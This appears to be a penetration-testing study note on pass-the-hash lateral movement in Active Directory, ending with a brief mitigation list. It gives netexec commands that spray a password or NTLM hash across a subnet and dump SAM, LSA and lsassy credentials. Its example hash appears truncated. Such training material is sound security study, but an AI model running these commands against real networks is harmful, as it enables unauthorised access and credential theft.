// notes/ Active Directory
🏛️

Lateral Movement Pass The Hash

With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network.

#active directory#adot8
source · oscp.adot8.com · active-directory/lateral-movement_pass-the-hash

Pass the Hash

Overview

With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network.

If the password/hash is one of a Local Administrator, we can use secretsdump to dump out more hashes from other computers, crack those passwords and pass them around again.

Netexec is the tool that will be used for this attack and it even stores a database of all the findings of the attack.

Netexec

Pass the Password

<pre class="language-bash"><code class="lang-bash"><strong>netexec smb 192.168.1.0/24 -u greg -d PNPT.local -p Password1 </strong></code></pre>

Pass the Hash

bash
$netexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404e' --local-auth

Pass the Hash Variations

bash
$--sam Dumps SAM
$--shares Dumps shares being offered by the machine
$--lsa Dumps LSA hashes (cached credentials)
$-M lsassy Dumps lsassy (recent user logins)

View crackmapexec database

bash
$nxcdb

{% embed url="https://www.netexec.wiki/getting-started/database-general-usage" %}

Mitigation

  • Limit account reuse
  • Don't reuse Local Administrator passwords
  • Disable Local Administrator and Guest accounts
  • Limit who is an Administrator
  • Strong password policy